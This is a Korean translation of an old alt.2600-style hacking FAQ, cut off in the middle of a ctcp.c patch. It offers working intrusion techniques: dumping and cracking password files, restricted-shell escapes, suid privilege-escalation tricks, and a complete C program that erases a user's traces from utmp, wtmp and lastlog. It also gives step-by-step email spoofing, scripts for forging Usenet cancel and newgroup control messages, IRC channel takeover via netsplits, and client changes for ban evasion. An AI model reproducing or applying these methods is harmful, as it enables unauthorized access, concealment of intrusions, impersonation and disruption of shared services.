WEB13


Hacking Frequently Asked Questions



UNIX에서 어떻게 패스워드 파일에 접근할 수 있나?

UNIX 패스워드를 어떻게 깨나?

패스워드 새도우란 무엇인가?

새도우화 되어 있는 패스워드 파일은 어디서 찾나?

NIS/yp란 무엇인가?

패스워드 파일에서 쉽표뒤에 나오는 이상한 문자들은 무엇인가?

VMS의 패스워드 파일에 어떻게 접근하나?

VMS 에서는 어떻게 패스워드를 깨나?

VMS에서 무엇을 로그로 남기나?

VMS에서의 권한은 어떤 것이 있나?

제한된 쉘에서 어떻게 빠져 나오나?

suid 스크립트나 프로그램에서 어떻게 root의 권한을 얻을 수 있나?

시스템 로그에서 내 존재를 없애는 방법은?

위조 메일(E-mail)은 어떻게 보내나?

Usenet에서는 어떻게 위조 메시지를 조작하고 포스팅할 수 있나?

IRC에서 어떻게 ChanOp(channel operator)를 해킹할 수 있나?

어떻게 IRC 클라이언트를 고쳐서 내 진짜 이름을 숨길 수 있나?

이상한 문자가 들어있는 디렉토리에 어떻게 들어갈 수 있나?

이더넷 엿보기(ethernet sniffing)란 무엇인가?

인터넷 아웃다이얼(Internet Outdial)이란?

인터넷 아웃다이얼은 어디에 있나?

이 시스템은 무엇인가?

XXX에서의 처음(default) 패스워드는 무엇인가?

트로이목마/웜/바이러스/논리 폭탄이란 무엇인가?

바이러스 같은 것으로부터 나 자신을 어떻게 보호할 것인가?

바이러스에 대한 정보는 어디서 얻을 수 있나?

암호xxx란 무엇인가?

PGP란 무엇인가?

Tempest란 무엇인가?

익명 재전송 메일(anonymous remailer)이란 무엇인가?

익명 재전송 메일은 어디에 있나?

복사 방지를 어떻게 깨나?

127.0.0.1은 무엇인가?

관리자 있는 뉴스그룹(moderated newsgroup)에 어떻게 포스팅을 하나?

e-mail로 Usenet에 어떻게 포스팅을 하나?

BIOS 패스워드는 어떻게 깨나?

암호화된 파일의 패스워드는 무엇인가?

C/C++ 로 실행코드를 역컴파일할 수 있는 가능성은 없는가?

MS-Windows의 패스워드 암호는 어떻게 동작하나?

나 절. 전화해킹(Telephony)

적색 기계(Red Box)란 무엇인가?

적색 기계는 어떻게 만드나?

6.5536Mhz의 수정진동자는 어디서 구하나?

적색 기계가 동작하는 공중전화는 어떤 것인가?

적색 기계로 어떻게 시내 전화를 할 수 있나?

청색 기계(Blue Box)란 무엇인가?

청색 기계는 아직 사용할 수 있나?

유색 기계(colored box)는 모두 무슨 기능이 있나?

ANAC 번호란 무엇인가?

내가 있는 지역의 ANAC 번호는?

재신호(ringback) 번호란 무엇인가?

내가 있는 지역의 재신호 번호는?

연결번호(loop)이란?

내가 있는 지역의 연결번호는?

CNA번호란 무엇인가?

내가 있는 지역의 전화회사 CNA번호는?

항상 통화중인 번호는 무엇인가?

전화 서비스를 잠시 중단하는 번호는 무엇인가?

감시 테스트 장치(Proctor Test Set)란?

내가 있는 지역의 감시 테스트 장치는 무엇인가?

스캐닝(scanning)이란?

스캐닝은 불법인가?

전화수리공의 장비를 어디서 살 수 있나?

DTMF 주파수란 무엇인가?

전화음의 주파수는 무엇인가?

* (LASS)코드는 모두 무엇인가?

무선 전화가 작동하는 주파수는 무엇인가?

발신자 식별자(caller-ID)는 무엇인가?

발신자 식별자는 어떻게 막을 수 있나?

PBX 란 무엇인가?

VMB란 무엇인가?

ABCD 음은 무엇을 위한 것인가?

국제 직접 번호(International Direct Number)란 무엇인가?


무선 전화

MTSO란 무엇인가?

NAM이란 무엇인가?

ESN이란 무엇인가?

MIN은 무엇인가?

SCM이란 무엇인가?

SIDH란 무엇인가?

진행/반전(forward/reverse) 채널이란?


사이트는 무엇인가?

해커에게 관심가는 fsp 사이트는 무엇인가?

해커에게 관심가는 뉴스그룹은 무엇인가?

해커에게 관심가는 telnet 사이트는 무엇인가?

해커에게 관심가는 gopher 사이트는 무엇인가?

해커에게 관심가는 WWW 사이트는 무엇인가?

해커에게 관심가는 IRC 채널은 무엇인가?

해커에게 관심가는 BBS는 무엇인가?

해커에게 관심가는 책은 무엇인가?

해커에게 관심가는 비디오는 무엇인가?

해커에게 관심가는 메일링 리스트는 무엇인가?

해커에게 관심가는 출판물은 무엇인가?

해커에게 관심가는 e-zine(전자잡지)는 무엇인가?

해커에게 관심가는 기관은 무엇인가?

해커에게 관심가는 라디오 프로그램은 무엇인가?

해커에게 관심가는 FAQ(frequentlry asked question)는 무엇인가?

자기띠(magnetic stripe)의 인코더(encoder)와 디코더(decoder)는 어디서 구입하나?

무지개색 책은 무엇이며 어디서 구할 수 있나?

alt.2600이란 무엇인가?

2600은 무엇을 의미하나?

2600이 온라인 형태로 존재하는가?

서점에서 2600을 구할 수 없다면 어떻게 해야 하나?

2600을 가판대에서 사는 것보다 주문하는 것이 왜 더 비싼가?


기타

XXX는 무엇을 의미하나?

내가 바른 신용카드 번호를 가지고 있는지 어떻게 획인하나?

자기때의 데이터 배치는 어떤 것인가?

해킹의 윤리는 무엇인가?




UNIX에서 어떻게 패스워드 파일에 접근할 수 있나?

표준 UNIX에서 패스워드 파일은 /etc/passwd이다. UNIX 중에서 NIS/yp 또는 패스워드 새도우기능을 갖춘 경우에 패스워드 정보는 다른 곳에 있다. 패스워드 파일의 엔트리는 7개의 콜론으로 구분된 필드가 있다.

구분해서 보면, 이 패스워드 파일의 줄은 다음과 같다.

Username(사용자 이름)

암호화된 패스워드 (선택적인 패스워드 수명 데이터)

사용자 번호

그룹 번호

GECOS 정보

홈 디렉토리

]

] /etc/passwd의 엔트리의 일례:

]

] will:5fg63fhD3d5gh:9406:12:Will Spencer:/home/fsg/will:/bin/bash

]


UNIX 패스워드를 어떻게 깨나?

일반적인 믿음과는 상반되겠지만, UNIX의 패스워드 파일은 해독할 수 없다. UNIX 패스워드는 단반향 함수(one way function)으로 암호화되어 있다. 로그인 프로그램은 "password:"라고 표시되는 프롬프트에서 입력되는 패스워드를 암호화하여 패스워드 파일에 암호화된 패스워드와 비교한다. 패스워드를 깨는 프로그램(password cracking program)은 단어장(wordlist)를 이용한다. 단어장에 있는 단어 하나씩을 암호화하여 패스워드 파일에 있는 암호와 비교한다. 지금까지 나와 있는 가장 좋은 패스워드 깨는 프로그램은 Alec Muffett이 작성한 Crack이다. DOS용 프로그램으로는 CrackJack이 가장 좋다. CrackJack은 ftp를 이용하여 clark.net의 /ub/jcase/ 디렉토리에서 구할 수 있다.

패스워드 새도우란 무엇인가?

패스워드 새도우란 보안 시스템으로서 암호화된 /etc/passwd의 패스워드 필드가 특별한 문자로 치환되어 있으며, 실제의 패스워드는 정상적인 사용자가 읽을 수 없는 파일에 저장되어 있다. 대부분(전부는 아니고)의 시스템에서 패스워드 새도우를 깨기 위해서 getpwent()함수를 연속적으로 부르는 프로그램을 작성하여 패스워드 파일을 만들 수 있다.

예:

#include <pwd.h>

main()

{

struct passwd *p;

while(p=getpwent())

printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,

p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);

}


새도우화 되어 있는 패스워드 파일은 어디서 찾나?

Unix Path(경로) Token

-----------------------------------------------------------------

AIX 3 /etc/security/passwd !

or /tcb/auth/files/<first letter #

of username>/<username>

A/UX 3.0s /tcb/files/auth/?/*

BSD4.3-Reno /etc/master.passwd *

ConvexOS 10 /etc/shadpw *

ConvexOS 11 /etc/shadow *

DG/UX /etc/tcb/aa/user/ *

EP/IX /etc/shadow x

HP-UX /.secure/etc/passwd *

IRIX 5 /etc/shadow x

Linux 1.1 /etc/shadow *

OSF/1 /etc/passwd[.dir|.pag] *

SCO Unix #.2.x /tcb/auth/files/<first letter *

of username>/<username>

SunOS4.1+c2 /etc/security/passwd.adjunct ##username

SunOS 5.0 /etc/shadow

<optional NIS+ private secure maps/tables/whatever>

System V Release 4.0 /etc/shadow x

System V Release 4.2 /etc/security/* database

Ultrix 4 /etc/auth[.dir|.pag] *

UNICOS /etc/udb *


NIS/yp란 무엇인가?

NIS(Network Information System)은 현재의 이름이고 예전에는 yp(Yellow Page)라고 불리웠다. NIS의 목적은 네트워크에서 여러 기계들이 패스워드와 같은 구성정보를 공유하기 위함이다. NIS는 시스템 보안을 위해서 설계되어 있지 않다. NIS를 이용하고 있다면 /etc/passwd 파일에 다음과 같은 것이 들어 있다.

+::0:0:::

실제 패스워드 파일을 보기 위해서 "ypcat passwd" 명령을 이용하면 된다.

패스워드 파일에서 쉽표뒤에 나오는 이상한 문자들은 무엇인가?

문자는 패스워드 수명(age)을 나타내는 것이다. 패스워드 수명은 관리자가 정한 기일 내에 패스워드 파일을 바꾸도록 한다. 패스워드 수명은 사용자가 패스워드를 바꾸기 전에 정해진 시간만큼은 사용하도록 하기도 한다.

]

] 패스워드 수명 기능이 들어 있는 /etc/passwd 파일의 일례

]

] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash

]

암호화된 패스워드 필드 뒤의 쉼표에 주의하자. 쉼표뒤에 나오는 문자는 모두 패스워드 수령기법을 위해서 사용된다.

]

] 위 예에서의 패스워드 수명 문자

]

] M.z8

]

4 개의 문자가 다음과 같이 번역된다.

1: 패스워드를 변경하지 않고 사용할 수 있는 최대 주(week)의 수

2: 패스워드를 변경하기 전까지 사용해야 할 최소 주(week)의 수

3&4: 1970년 이후로 주의 수로 마지막 패스워드가 바뀐 때

3가지 특별한 경우가 있다.

첫 번째와 두 번째 문자가 '..'로 설정되어 있을 때, 사용자는 다음에 로그인할 때 패스워드를 바꿔야만 한다. 그리고나서 패스워드 프로그램은 패스워드 수명 문자를 없애고, 사용자는 다시 새로운 패스워드 수명에 적용을 받게 된다.

세 번째와 네 번째 문자가 '..'로 설정되어 있을 때, 사용자는 다음에 로그인할 때 패스워드를 바꿔야 한다. 패스워드 프로그램은 첫 번째 두 번째의 경우와 같은 행동을 한다.

만일 첫 번째 문자(MAX)가 두 번째 문자(MIN) 보다 작을 경우, 사용자는 패스워드를 바굴 수 있는 허가가 박탈된다. root만이 이 사용자의 패스워드를 변경할 수 있다.

su 명령은 패스워드 수명 데이터를 검사하지 않는다는데 유의하기 바란다. 말소된 패스워드를 가진 계정으로 su를 행할 수 있다.

패스워드 수명 코드(Password Aging Codes)

+------------------------------------------------------------------------+

| |

| Character: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H |

| Number: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |

| |

| Character: I J K L M N O P Q R S T U V W X Y Z a b |

| Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |

| |

| Character: c d e f g h i j k l m n o p q r s t u v |

| Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |

| |

| Character: w x y z |

| Number: 60 61 62 63 |

| |

+------------------------------------------------------------------------+

VMS의 패스워드 파일에 어떻게 접근하나?

VMS에서 패스워드 파일은 SYS$SYSTEM:SYSUAF.DAT이다. 그러나, UNIX와는 다르게 대부분의 사용자는 패스워드 파일을 읽을 수 있는 권한이 없다.

VMS 에서는 어떻게 패스워드를 깨나?

SYS$GETUAF 함수를 이용하여 SYSUAF.DAT에 있는 암호화된 패스워드와 결과를 비교하는 프로그램을 작성한다.

두 가지 프로그램이 있는데, CHECK_PASSWORD 와 GUESS_PASSWORD이다.

로그로 남기나?

VMS의 거의 모든 것을 로그로 남길 수 있다. SHOW ACCOUNTING 명령을 이용하여 시스템의 로그 상태를 조사할 수 있다. 시스템 감사가 보안의 목적으로 로그 정보를 남기는 것에 반해, 계끑¤ 이용상태에 대한 정보를 남기는 것이 시스템 어카운팅이다(CPU 이용시간, 트린터 사용 등). 어카운팅을 하기위해서는 다음과 같은 절차를 따른다.

$ SET ACCOUNTING [/ENABLE=(Activity...)]

이렇게 하면, SYS$MANAGER:ACCOUNTING>DAT 파일에 감시 로그정보를 남긴다. 이것은 또한 이전 로그 파일을 닫고 새로운 버전의 로그를 남긴다.

다음과 같은 것이 로그로 남을 수 있다.

BATCH Termination of a batch job

DETACHED Termination of a detached job

IMAGE Image execution

INTERACTIVE Interactive job termination

LOGIN_FAILURE Login failures

MESSAGE Users messages

NETWORK Network job termination

PRINT Print Jobs

PROCESS Any terminated process

SUBPROCESS Termination of a subprocess

보안 감사를 이용하기 위해서는

$ SET AUDIT

/ALARM 은 보안 운영자로 지정된 터미널에 경고를 울리기 위해서 사용하는 옵션이다. 다시 말해서 SECURITY 권한이 필요함을 일깨우는 데 사용된다. 보안 감사 구성을 $ SHOW AUDIT

/ALL명령을 통해서 알수 있다.

보안 감사는 다음과 같은 행위를 로그로 남기도록 할 수 있다.

ACL Access Control List requested events

AUTHORIZATION Modification to the system user

authorization file SYS$SYSTEM:SYSUAF.DAT

BREAKIN Attempted Break-ins

FILE_ACCESS File or global section access

INSTALL Occurrence of any INSTALL operations

LOGFAILURE Any login failures

LOGIN A login attempt from various sources

LOGOUT Logouts

MOUNT Mount or dismount requests


VMS에서의 권한은 어떤 것이 있나?

ACNT Allows you to restrain accounting messages

ALLSPOOL Allows you to allocate spooled devices

ALTPRI Allot Priority. This allows you to set any priority

value

BUGCHK Allows you make bug check error log entries

BYPASS Enables you to disregard protections

CMEXEC/

CMKRNL Change to executive or kernel mode. These privileges

allow a process to execute optional routines with KERNEL

and EXECUTIVE access modes. CMKRNL is the most powerful

privilege on VMS as anything protected can be accessed

if you have this privilege. You must have these

privileges to gain access to the kernel data structures

directly.

DETACH This privilege allow you to create detached processes of

arbitrary UICs

DIAGNOSE With this privilege you can diagnose devices

EXQUOTA Allows you to exceed your disk quota

GROUP This privilege grants you permission to affect other

processes in the same rank

GRPNAM Allows you to insert group logical names into the group

logical names table.

GRPPRV Enables you to access system group objects through

system protection field

LOG_IO Allows you to issue logical input output requests

MOUNT May execute the mount function

NETMBX Allows you to create network connections

OPER Allows you to perform operator functions

PFNMAP Allows you to map to specific physical pages

PHY_IO Allows you to perform physical input output requests

PRMCEB Can create permanent common event clusters

PRMGBL Allows you to create permanent global sections

PRMMBX Allows you to create permanent mailboxes

PSWAPM Allows you to change a processes swap mode

READALL Allows you read access to everything

SECURITY Enables you to perform security related functions

SETPRV Enable all privileges

SHARE Allows you to access devices allocated to other users.

This is used to assign system mailboxes.

SHMEM Enables you to modify objects in shared memory

SYSGBL Allows you to create system wide permanent global

sections

SYSLCK Allows you to lock system wide resources

SYSNAM Allows you to insert in system logical names in the

names table.

SYSPRV If a process holds this privilege then it is the same as

a process holding the system user identification code.

TMPMBX Allows you create temporary mailboxes

VOLPRO Enables you to override volume protection

WORLD When this is set you can affect other processes in the

world

프로세스가 어떤 권한으로 수행하고 있는지 알기 위해서 다음과 같은 명령을 사용한다.

$ show /proc/priv

제한된 쉘에서 어떻게 빠져 나오나?

잘못 작성한 제한 쉘에서는 쉘에서 사용하는 기능을 가진 프로그램을 수행함으로서 빠져나올 수 있다. 좋은 예가 vi이다. vi를 수행할 때 다음과 같은 명령을 이용하라.

:set shell=/bikn/sh

그리고 나서 다으모가 같은 명령을 이용하여 쉘을 얻는다.

: shell

제한 쉘에서 "cd" 명령을 사용할 수 없도록 한다면 그 계정으로 ftp를 하면 cd를 할 수 있다.

suid 스크립트나 프로그램에서 어떻게 root의 권한을 얻을 수 있나?

1. 프로그램에서 system()을 이용하여 다른 프로그램을 부른다.면, IFS를 변경하여 그 프로그램을 우롱할 수 있다. IFS는 내부 필드 구분자(Internal Field Separator)의 약자로서 쉘에서 인수를 구분하는 문자로서 사용하는 것이다.

프로그램에 다음과 같은 것이 포함된다고 하자.

system("bin/data")

그리고 IFS를 '/'로 변경하면 쉘은 명령을 다음과 같이 번역한다.

bin date

이제, 프로그램 중에 bin이라는 것이 경로(path)중에 있다면, suid 프로그램은 /bin/date 프로그램 대신 bin이라는 프로그램을 수행하게 된다.

IFS를 바꾸기 위해서, 다음과 같은 명령을 이용한다.

IFS='/'; export IFS

setenv IFS '/'

export IFS='/'

2. 스크립트를 -i로 연결(link)한다.

"-i"라는 프로그램을 만들어 심볼릭 링크(symbolic link)를 만든다. "-i"를 수행하면 쉘(/bin/sh)이

상호작용(interactive) 모드가 되게 한다. 이 방법은 suid(set uid)되어 있는 스크립트에서만 사용가능하다.

예:

% ln suid.sh -i

% -i

#

3. 경쟁 조건을 이용한다.

커널에서 /bin/sh를 로드할 때 다른 프로그램으로 프로그램에 대한 심볼릭 링크를 바꾼다.

예:

nice -19 suidprog; ln -s evilprog suidroot

4. 프로그램에 잘못된 입력을 보낸다.

프로그램과 다른 명령을 한 커맨드 라인에서 수행한다.

예:

suidprog; id


시스템 로그에서 내 존재를 없애는 방법은?

/etc/utmp, /usr/adm/wtmp와 /usr/adm/lastlog 파일을 변경한다. 이것들은 텍스트 파일이 아니라

서 vi로 편집할 수 없다. 특별한 목적을 지닌 프로그램을 작성해야 한다.

예:

#include <sys/types.h>

#include <stdio.h>

#include <unistd.h>

#include <sys/file.h>

#include <fcntl.h>

#include <utmp.h>

#include <pwd.h>

#include <lastlog.h>

#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)

char *who;

{

struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {

while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof( utmp_ent ));

lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

write (f, &utmp_ent, sizeof (utmp_ent));

}

close(f);

}

}

void kill_wtmp(who)

char *who;

{

struct utmp utmp_ent;

long pos;

pos = 1L;

if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {

lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

pos = -1L;

} else {

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof(struct utmp ));

lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

write (f, &utmp_ent, sizeof (utmp_ent));

pos = -1L;

} else pos += 1L;

}

}

close(f);

}

}

void kill_lastlog(who)

char *who;

{

struct passwd *pwd;

struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

bzero((char *)&newll,sizeof( newll ));

write(f, (char *)&newll, sizeof( newll ));

close(f);

}

} else printf("%s: ?\n",who);

}

main(argc,argv)

int argc;

char *argv[];

{

if (argc==2) {

kill_lastlog(argv[1]);

kill_wtmp(argv[1]);

kill_utmp(argv[1]);

printf("Zap2!\n");

} else

printf("Error.\n");

}




위조 메일(E-mail)은 어떻게 보내나?

메일이 온 것으로 보이게 할 호스트의 25 번 포트로 telnet을 한다. 다음 예와 같이 메시지를 쳐 넣는다.

HELO bellcore.com

MAIL FROM:voyager@bellcore.com

RCPT TO:president@whitehouse.gov

DATA

From: voyager@bellcore.com (The Voyager)

To: president@whitehouse.gov

Subject: Clipper

Reply-To: voyager@bellcore.com

Please discontinue your silly Clipper initiative.

.

QUIT

RFC 931에 따라 구현된 시스템에서 "MAIL FROM:"을 속이는 것은 되지 않는다. 자신에게 먼저 위조 메일을 보내서 확인한다.

RFC 822 "Standard for the format of ARPA Internet text messages"에 더 많은 정보가 있다.


Usenet에서는 어떻게 위조 메시지를 조작하고 포스팅할 수 있나?

From: Anonymous (Pretending to be: tale@uunet.uu.net (David C Lawrence))

Subject: FAQ: 위조를 통한 더 나은 삶 Date: 19 Mar 1995 02:37:09 GMT

"anonymous" 재전송 메일을 이용하지 않는 익명 넷뉴스(netnews).

최근 "NetNews Judges-L"에 영감을 얻어서, 여기서 제어 메시지를 위조하는 것을 포함하도록 하였다. 따라서 독자들은 자신의 투고를 취소하고 자신의 뉴스그룹을 생성하고 삭제할 수 있게 되

었다. 어떤 뉴스 기사들을 저장하라. 여기서는 그것을 "hak"이라고 예를 들어 부르겠다. "hak"을 편집하고 문서형식에서 해더는 제거한다.

From some!random!path!user (note: "From ", not "From: " !!)

Article:

Lines:

Xref:

Path: 의 헤더를 마지막 두 세 개의 까지로 줄인다.

이것은 뉴스 기사가 원래의 곳에서 포시팅 된 것처럼 보이거나, 보낸 곳의 근처의 호스트에서 보낸 것 처럼 만든다. 또는 전혀 새로운 Path: 줄을 만들어서 가짜 에일리어스(alias)를 나타내게 할 수 있다.

다른 곳과 겹치지 않을만한 것으로 Message-ID: 필드를 변경한다. 이것은 @앞에 두 자 정도의 아무 글자나 추가함으로서 할 수 있다. 왜냐하면 뉴스 포스팅 프로그램은 대개 고정길이 필드를 이용하여 이러한 ID를 만들기 때문이다.

쓰고 싶은 아무 것이나를 다른 해더에 넣는다. --From:, Newsgroups:,

Sender: 등. 원래의 메시지를 자신의 메시지로 바꾼다. 관리되고 있는 뉴스그룹에 포스팅을 할 때나 제어 메시지를 포시팅할 때, Approved: 헤더를 넣어서 관리 메카니즘을 피해가는 것을 잊지 말아야 한다.

다른 사람의 기사를 취소할려고 할 때, 그것의 message-ID가 있어야 한다. 이미 있는 메시지 헤더와 자신의 메시지 헤더는 message-ID와 더불어 다음과 같은 것을 포함해야 한다. 이것은 "control message"를 만든다. 주의: 제어 메시지(control messages)는 대개 Approved: 해더가 필요하므로 하나를 추가하도록 한다.

Approved: header as well, so you should add one.

Subject: cmsg cancel <xb8700A@twits.site.com>

Control: cancel <xb8700A@twits.site.com>

Approved: luser@twits.site.com

Newsgroups are created and destroyed with control messages, too. If

you wanted to create, for instance, comp.misc.microsoft.sucks, your

control headers would look like

Subject: cmsg newgroup comp.misc.microsoft.sucks

Control: newgroup comp.misc.microsoft.sucks

그룹이 "moderated with no moderator"(관리자없이 관리됨)을 원할 경우 문자열 "moderated"를

이 끝에 붙인다. 메시지의 본문 중간에 생성하려는 그룹에 대한 설명과 함께 변경된 다음과 같은 텍스트를 포함해야 한다.

For your newsgroups file:

comp.misc.microsoft.sucks We don't do windows

그룹을 없애기 위해서 앞의 헤더 줄에서 "newsgroup"를 "rmgoup"으로 대치한다. 대부분의 사이트에서 "rmgroup" 요청을 관리하는 사람이 그렇게 할 것인지 아닌지를 정하게 하고 있다는 것을 명심하자. 그룹 생성은 아마도 삭제보다는 자동화되어 있을 것이다. 뉴스그룹 변경은 나 자신으로부터의 것일 경우 효과가 있을 가능성이 높ㄷ. 왜냐하면 나의 이름이 많은 NNTP 서버의 제어 스크립트에 들어 있기 때문이다. 따라서 이 포스팅의 헤더로부터 From: 과 Approved: 을 이용하은 것을 권고한다.

변경된 기사를 저장하고 자신의 사이트나 자신을 가리키는 것이 없도록 확실하게 한다. 그리고 자신이 제일 좋아하는 IHAVE 명령을 전달할 수 있는 NNTP 서버에 보낸다. 이 때 다음과 같은 스크립트를 이용한다.

=======================

#! /bin/sh

## Post an article via IHAVE.

## args: filename server

if test "$2" = "" ; then

echo usage: $0 filename server

exit 1

fi

if test ! -f $1 ; then

echo $1: not found

exit 1

fi

# suck msg-id out of headers, keep the brackets

msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \

sed 's/.*-[Ii][Dd]: //'`

echo $msgid

( sleep 5

echo IHAVE $msgid

sleep 5

cat $1

sleep 1

echo "."

sleep 1

echo QUIT ) | telnet $2 119

=======================

기사가 하루나 이틀 사이에 나타나지 않을 경우, 다른 서버를 시도해본다. 서버는 찾기 쉽다. 여기에 저장된 네트뉴스를 시도해 볼 수 있는 서버의 목록으로 나누어주는 스크립트가 있다. 여기서 나오게 될 결과를 편집하여 사람 이름이 분명한 것과 다른 쓰레기들을 제거하고 사용하면 된다.

=======================

#! /bin/sh

FGV='fgrep -i -v'

egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\

/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp

=======================

Once you have your host list, feed it to the following script.

=======================

#! /bin/sh

while read xx ; do

if test "$xx" = "" ; then continue;

fi

echo === $xx

( echo open $xx 119

sleep 5

echo ihave IamSOk00l@podunk.edu

sleep 4

echo .

echo quit

sleep 1

echo quit

) | telnet

done

=======================

위의 스크립트의 이름이 "findem"이고 csh을 이용하고 있다면,

findem < list >& outfile

라고 명령어를 입력하여 모든 telnet의 출력을 저장할 수 있도록 한다. 시간이 오래걸릴 수도 있으나, 끝나면 "outfile"을 편집하고 "335"가 있는 곳을 찾는다. 이것은 서버가 기사를 받을 준비가 되었다는 것을 의미한다. 이것은 완전히 믿을만한 표시는 아니다. 왜냐하면 어떤 서버는 기사를 받겠다고 응답을 하고나서 기사를 버리는 경우도 있기 때문이다. 다른 사람의 메시지를 약간만 변형해서 서버에 보내본 뒤 기사나 나타나는지를 확인한다. 때때로 telnet이 이상한 상태에 빠져 멈추기도 한다. 특히 서버가 NNTP 연결을 거부하는 경우에 특히 그렇다. 만일 멈추어 버린 telnet 프로세스를 kill명령으로 죽이고 스크립트는 수행상태로 놓아둔다면, 스크립트는 계속 수행된다. 다시 말해서 수행중인 finding script를 잠시 감시해야 한다.

IHAVE 를 받아들이지 않으면서 "posting ok"를 보내는 서버를 발결할 수도 있다. 이런 서버들은 POSTS를 통해서 할 수 있을 것이다. 그러나, 이런 서버들은 어디서부터 연결된 것인지를 포함하은 헤더를 가지는 "NNTP-Posting-Host: "를 추가할 것이다. 그러므로 완전히 익명이 될 수 없다.

여기에 나온 정보를 건설적인 목적으로만 사용하기를 바란다.


IRC에서 어떻게 ChanOp(channel operator)를 해킹할 수 있나?

다른 IRC 서버들과 분리된 서버를 찾아낸다. 그리고 채널 OP가 되고 싶은 채널의 이름을 가지고 새로운 채널을 만든다. 서버가 IRC 네트워크에 연결될 때, 실제 채널에서도 OP까 된다. 서버 OP일 경우 고의로 서버를 분리할 수 있다.


어떻게 IRC 클라이언트를 고쳐서 내 진짜 이름을 숨길 수 있나?

주목 : 이 FAQ는 다른 사람이 작성한 것이다. 그러나, 나는 그가 누구인지 모른다. 누가 처음 이것을 작성했는지 아는 사람은 메일을 보내주었으면 좋겠다.

-인용문 시작-

ircII 클라이언트의 원시코드에 다음과 같은 변경을 하고나서 다시 컴파일을 할 경우 새로운 명령 /NEWUSER 명령을 사용할 수 있다. 이 명령은 다음과 같이 사용할 수 있다.

<new_username>은 사용하게 될 새로운 사용자 이름이며 필수이다. [new_IRCNAME]은 새로 사

용하게 될 IRCNAME이며 옵션이다.

이렇게 하면 일단 서버에서 분리하고나서 새로운 정보를 이용하여 다시 접속하게 된다. 현재 있던 모든 채널에 다시 들어가게되고 현재 별명(nickname)을 유지한다.

효과는 수행중에 사용자이름과 IRCname을 바꿀수 있다는 것이다. 서버에서 분리되었다가 다시 접속하더라도 ircII 클라이언트는 빠져나간 것이 아니다. 그러므로 상태정보나 에이리어스(alias)은 그대로 유지된다. 이 방법은 금지(ban)상태에 있는 (ro)bot들을 정말로 귀찮게 하는데 이상적이다.

이것은 ircII에서 새로운 명령이므로 스크립트로 사용할 수 있다. NEWUSER 명령으로 재접속할 때 시간이 걸린다는 데 유의하기 바란다. NEWUSER 다음에 수행되어야 할 명령에 TIMER를 주도록 하라. 예를 들어, ban 회피는 매우 쉽다(그러나 사이트 전체가 금지되었을 때 무한 재접속을 시도하게 됨에 유의하라)

on ^474 * {

echo *** Banned from channel $1

if ($N == [AnnMurray]) {

nick $randomstring

join $1

} {

nick AnnMurray

newuser $randomstring

timer 5 join $1

}

}

또는 귀찮게 하기 위해서 /BE <nickname> 은 username과 IRCNAME을 에일리어스할 수 있다.

^on ^311 * {

^on 311 -*

newuser $2 $5-

}

whois $0

}

이제.. ircII 클라이언트에 새로운 명령을 추가하기 위해서, 최신 클라언트의 소스 코드를 구하고

(아니면 지금 사용하고 있는 클라이언트의 소스코드라도). "edit.c"가 있는 디렉토리로 들어가서 그 파일을 고친다. 다음과 같은 수정을 한다.

다음 문장이 있는 줄을 찾는다.

extern void server();

다음과 같은 문장을 그 줄 뒤에 넣는다.

static void newuser();

이것은 뒤에 추가할 "newuser()"함수를 미리 정의한다.

이제, 다음과 같은 문장이 있는 줄을 찾는다.

"NAMES", "NAMES", funny_stuff, 0,

그 뒤에 다음과 같은 문장을 넣는다.

"NEWUSER", NULL, newuser, 0,

이리하면 정당한 IRCII 명령에 NEWUSER라는 새로운 명령을 추가하게 된다. 그리고 그 기능을 수행하기 위해서 새로운 함수 newuser()를 부르게 한다.

마지막으로 파일의 맨 끝으로가서 "newuser()"함수를 추가한다.

/*

* newuser: the /NEWUSER command. Added by Hendrix

* Parameters as follows:

* /NEWUSER <new_username> [new_IRCNAME]

* <new_username> is a new username to use and is required

* [new_IRCNAME] is a new IRCNAME string to use and is optional

* This will disconnect you from your server and reconnect using

* the new information given. You will rejoin all channels you

* are currently on and keep your current nickname.

*/

static void newuser(command, args)

char *command,

*args;

{

char *newuname;

if (newuname = next_arg(args, &args))

{

strmcpy(username, newuname, NAME_LEN);

if (*args)

strmcpy(realname, args, REALNAME_LEN);

say("Reconnecting to server...");

close_server(from_server);

if (connect_to_server(server_list[from_server].name,

server_list[from_server].port, primary_server) != -1)

{

change_server_channels(primary_server, from_server);

set_window_server(-1, from_server, 1);

}

else

say("Unable to reconnect. Use /SERVER to connect.");

}

else

say("You must specify a username and, optionally, an IRCNAME");

}

-인용문 끝-

/NEWUSER는 CTCP 쿼리(query)에서 숨겨줄 수 있는 것이 아니다. 그렇게 하기 위해서는 ctcp.c를 다음에서 보여주는 바와 같이 수정해야 한다. 그리고 CTCPFINGER라는 환경변수를 쿼리가 들어올 때 보여주고자 하는 정보로 설정하면 된다.

*** ctcp.old

--- ctcp.c

***************

*** 334 ****

! char c;

